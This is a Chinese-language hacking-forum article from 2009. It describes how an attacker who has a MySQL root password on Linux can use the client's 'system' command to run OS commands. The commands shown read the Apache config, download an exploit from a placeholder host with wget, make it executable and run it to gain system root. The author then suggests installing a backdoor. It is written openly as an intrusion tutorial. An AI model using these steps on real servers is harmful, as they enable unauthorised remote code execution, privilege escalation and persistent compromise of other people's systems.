获取邀请码 | 基地首页 | 基地文章 | 基地动画 | 基地软件 | 技术论坛 | 会员学院
 
 
热门搜索:安全 安全工具 网络安全 会员培训 CMS建站网 安全
攻防总结免费资源网赚文章网管技巧防火墙技术端口入侵Sniffer嗅探arp技术
DDOS攻防3389攻防灰鸽子文章逆向工程破解实例加密技术脱壳技术溢出漏洞
serv-u漏洞社会工程学渗透技术跨站技术提权技术
 您现在的位置: 新世纪网安基地 >> 文章 >> 脚本攻防 >> 文章正文
linux下mysql 5.x得到root密码后的另外一种利用方式
作者:admin    文章来源:转载    点击数:    更新时间:2009-7-4

linux下mysql 5.x得到root密码后的另外一种利用方式
Author: Sh@dow

刚才在卫生间蹲着的时候忽然想到这个问题,mysql5.x for linux下面有一个函数,可以帮助我们干很多事情,这个函数4。x下面貌似没,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的明天再看看函数手册,再装一个实验一下。mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的范围内。

一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如此这般。今天我们换一种方式。

按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是按照我的的方法,没有必要再去找web路径了,直接执行




mysql>system vi /etc/httpd/conf/httpd.conf;
mysql>system vi /etc/httpd/conf/httpd.conf;



直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,比如,下载exp执行,搞到root权限,然后装后门虾米的




mysql>system wgethttp://xxxx.xxx.com/xxxx ; 
  
mysql>system chmod x xxxx;
  
mysql>system ./xxxx;
mysql>system wgethttp://xxxx.xxx.com/xxxx mysql>system chmod x xxxx;mysql>system ./xxxx;



这样mysql的root此时就成为system的root了,剩下的事情,假如开了ssh,就ssh上去,输入mysql的用户密码,ok,搞定。

或者,直接提权之后,下载后门安装,这个就留给大家去研究了。

『关闭该页』 『打印该页』

  • 上一篇文章:
  • 责任编辑:Wangtianxiang 
  • 下一篇文章:
  • 最近更新
    推荐文章小黑哥:月收入3000的
    推荐文章黑客横行,教你设个陷阱
    推荐文章批处理学习完全教程
    推荐文章安全技巧:检查自己的
    推荐文章多种方法:揪出隐藏在电
    推荐文章介绍一种通过的个人电
    推荐文章SEO专家祝鹏:浅谈SEO
    推荐文章王通:让网络销售疯狂
    推荐文章三步让你录制的动画体
    推荐文章深度解析:IE7 0Day 漏
    热门文章
    推荐文章小黑哥:月收入3000的
    普通文章最高速的winrar密码破
    普通文章“肉鸡”获取内幕揭秘
    普通文章98888 QQ号被盗案水落
    普通文章2009年最新QQ申诉经验
    普通文章QQ盗号真凶被找到了
    普通文章黑吃黑 中国最美女黑客
    普通文章局域网检测全过程
    推荐文章黑客横行,教你设个陷阱
    普通文章“谷歌一下”竟可搜出
    相关文章
    玩转注册表高级用法--
    “黑客”竟敢街头招摇称
    夫妻利用电话充值卡漏洞
    保护Linux系统安全十招搞
    如何防止整站SQL注入方式
    80后大学生办网站被
    菜鸟学习SEO笔记:网站优
    BD+加密技术再次封锁破解
    AspProductCatalog漏洞分
    父子俩开“低价”购物网
    虚拟货币新规出台 网游告
    web和数据库分离的渗透思
    QQ聊天频现“虚拟视频”
    “99999”QQ号高卖出30万
    命令下加账号新方法
    Echo 出 WebShell
    用iptables封杀内网的bt
    利用cpl文件在xp中留一个
    菜鸟基础:让被病毒恶意
    上万"肉鸡"轰瘫小城网络
    关于我们 | 加入会员 | 网安商城 | 投稿方法 | 广告报价| 友情连接 | 网站地图 | 网安论坛网安招聘 |Java
    加入会员咨询QQ:65444425 投稿方法: 广告与合作QQ:9324223

    浙ICP备06031184号